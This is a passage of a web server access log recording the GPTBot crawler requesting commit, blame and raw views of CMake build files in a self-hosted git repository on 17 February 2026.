"/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33664] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10010] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33665] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42453] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43102] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21734] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21735] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21633] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10526] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10090] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10095] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10094] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 